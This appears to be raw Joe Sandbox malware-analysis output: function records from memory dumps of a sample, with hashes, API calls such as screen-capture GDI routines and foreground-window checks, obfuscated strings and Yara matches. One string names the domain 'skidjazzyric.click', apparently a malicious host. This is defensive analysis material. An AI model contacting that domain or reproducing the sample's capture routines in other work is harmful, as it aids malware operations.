                                                                                                        • Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                        • Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
                                                                                                        • Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                        • Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
                                                                                                        • API String ID: 237503144-2846770461
                                                                                                        • Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                                                        • Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
                                                                                                        • Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                                                        • Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
                                                                                                        • API String ID: 0-2419925205
                                                                                                        • Opcode ID: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
                                                                                                        • Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
                                                                                                        • Opcode Fuzzy Hash: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
                                                                                                        • Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID: ~|$SP$if$pv$tj$vt
                                                                                                        • API String ID: 3664257935-1422159894
                                                                                                        • Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                        • Instruction ID: 3f2bf66d6cad3df7d28daa15d554fca54d12e09b0a6c0df10915c8315d2a852b
                                                                                                        • Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                                                        • Instruction Fuzzy Hash: C8621570689350AFE724CB24CCD1B2FB7E2EFC5718F18862CE595972D1E7B1A8058B85
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00419CE7
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00419D24
                                                                                                          • Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                        • String ID: ~|$SP$if$pv$tj$vt
                                                                                                        • API String ID: 764372645-1422159894
                                                                                                        • Opcode ID: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
                                                                                                        • Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
                                                                                                        • Opcode Fuzzy Hash: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
                                                                                                        • Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5&'d$O$~
                                                                                                        • API String ID: 0-1622812124
                                                                                                        • Opcode ID: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
                                                                                                        • Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
                                                                                                        • Opcode Fuzzy Hash: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
                                                                                                        • Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A
                                                                                                        APIs
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                        • String ID: B"@$)RSP$=^"\$`J/H$rp
                                                                                                        • API String ID: 237503144-816972838
                                                                                                        • Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                        • Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
                                                                                                        • Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                        • Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94
                                                                                                        APIs
                                                                                                          • Part of subcall function 02126BE7: GetDC.USER32(00000000), ref: 02126BF0
                                                                                                          • Part of subcall function 02126BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 02126C11
                                                                                                          • Part of subcall function 02126BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 02126C21
                                                                                                          • Part of subcall function 02126BE7: DeleteObject.GDI32(00000000), ref: 02126C28
                                                                                                          • Part of subcall function 02126BE7: CreateCompatibleDC.GDI32(00000000), ref: 02126C37
                                                                                                          • Part of subcall function 02126BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02126C42
                                                                                                          • Part of subcall function 02126BE7: SelectObject.GDI32(00000000,00000000), ref: 02126C4E
                                                                                                          • Part of subcall function 02126BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02126C71
                                                                                                        • CoUninitialize.COMBASE ref: 020FD7BC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
                                                                                                        • String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
                                                                                                        • API String ID: 3248263802-1525209810
                                                                                                        • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                        • Instruction ID: 429d81495f615712d26dd0c949515210fb0b369ff4d572120766a0e47198c868
                                                                                                        • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                        • Instruction Fuzzy Hash: 93B128756487818BE766CF2AC4D0762BBE2FF96304B18C1ACC4D64FB4AD738A406DB51
                                                                                                        APIs
                                                                                                          • Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
                                                                                                          • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                          • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                          • Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                          • Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                          • Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                          • Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                          • Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                          • Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                          • Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                        • CoUninitialize.OLE32 ref: 0040D555
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
                                                                                                        • String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
                                                                                                        • API String ID: 3213364925-1525209810
                                                                                                        • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                        • Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
                                                                                                        • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                        • Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                        • API String ID: 0-102253164
                                                                                                        • Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                        • Instruction ID: 224120f464f4b6dfcaa3b7bc916de982b52a38a3f06c3d25e374395dfdc61d20
                                                                                                        • Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                        • Instruction Fuzzy Hash: 803227B19402118BCB24CF28C8927B6B7B2FF95318F28929DD8416F7D5E775A802CBD5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                        • API String ID: 0-102253164
                                                                                                        • Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                        • Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
                                                                                                        • Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                        • Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5
                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 020F8B0B
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 020F8B15
                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 020F8BBC
                                                                                                        • GetForegroundWindow.USER32 ref: 020F8BD1
                                                                                                        • ExitProcess.KERNEL32 ref: 020F8D1E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                        • String ID: 6W01
                                                                                                        • API String ID: 4063528623-326071965
                                                                                                        • Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                        • Instruction ID: 55d6ee4f51ec8af7e6001c6f42445c5b02aac9f5b96c2bd019e4bc6152be8e91
                                                                                                        • Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                        • Instruction Fuzzy Hash: C2518C73A843040FD768AF65CC45396BAC79FC1310F1BC1399A85AB7E6EA74880697C1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
                                                                                                        • API String ID: 0-74227037
                                                                                                        • Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                        • Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
                                                                                                        • Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                        • Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: )RSP$=^"\$B:$C@$K3$bX_^
                                                                                                        • API String ID: 0-3030200349
                                                                                                        • Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                        • Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
                                                                                                        • Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                        • Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0$8<j?$D$4b
                                                                                                        • API String ID: 0-1320392364
                                                                                                        • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                        • Instruction ID: 06a1105e7f08b3e02bf7fb39e9350cd017f6feab4a5e4451b1095826f98744e1
                                                                                                        • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                        • Instruction Fuzzy Hash: 4891F96124C3818BD718CF3984A137AFBD29FD6218F29897DE4D6CB291D339C50AC716
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0$8<j?$D$4b
                                                                                                        • API String ID: 0-1320392364
                                                                                                        • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                        • Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
                                                                                                        • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                        • Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                        • API String ID: 0-3770969982
                                                                                                        • Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                        • Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
                                                                                                        • Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                        • Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                        • API String ID: 0-3770969982
                                                                                                        • Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                        • Instruction ID: 8803d7cab10f6db03ee4463b215b6486c64d0c42923122a4c66f2ef6571414a4
                                                                                                        • Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                        • Instruction Fuzzy Hash: 5871CFB654D3958BD304DF12C8802AFBBE2FBD1318F188E6CE5D85B251C779854A8F86
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: B:$C@$K3$bX_^
                                                                                                        • API String ID: 0-595269213
                                                                                                        • Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                        • Instruction ID: 3382a936f3d22611e4a55b1e55e46b4914e0b92bc3f357afe3608c700fe9eab9
                                                                                                        • Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                        • Instruction Fuzzy Hash: A941CEB5D112689BDB20EF79CD827DDBFB1AB85300F4442AAE448A7295D7340E498FD2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8<j?$D$4b
                                                                                                        • API String ID: 0-2390459867
                                                                                                        • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                        • Instruction ID: 13caccb2217fdc51cbe2267e4fe442fbfe61158fba99fcaf479fb66b31314458
                                                                                                        • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                        • Instruction Fuzzy Hash: A781FA6024C3828BD719CF39846137AFBD29FD6218F28897DE4D68B281D379C506CB16
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8<j?$D$4b
                                                                                                        • API String ID: 0-2390459867
                                                                                                        • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                        • Instruction ID: a1ee3a5702c1b870a507b5e59ad479deb13895f66f6ac844db3a97bc1aebdaaa
                                                                                                        • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                        • Instruction Fuzzy Hash: 7C81FA6124C3828BD719CF3984A137AFFD29FD6218F28897DE4D68B281D379C506C716
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8<j?$D$4b
                                                                                                        • API String ID: 0-2390459867
                                                                                                        • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                        • Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
                                                                                                        • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                        • Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8<j?$D$4b
                                                                                                        • API String ID: 0-2390459867
                                                                                                        • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                        • Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
                                                                                                        • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                        • Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #=0$Z$ut
                                                                                                        • API String ID: 0-1971374411
                                                                                                        • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                        • Instruction ID: d7efd799e28115e841c73c0df4af096e2b2cf5855dbf578d68bff10efe6242bb
                                                                                                        • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                        • Instruction Fuzzy Hash: 2A81363110C3868BD7468F38C450B7AFFE1AFA3318F1889ADD5D29B682D329D50AD752
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000001.00000002.1945700743.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_400000_67E6.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #=0$Z$ut
                                                                                                        • API String ID: 0-1971374411
                                                                                                        • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                        • Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
                                                                                                        • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                        • Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_20f0000_67E6.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8<j?$D$4b
                                                                                                        • API String ID: 0-2390459867
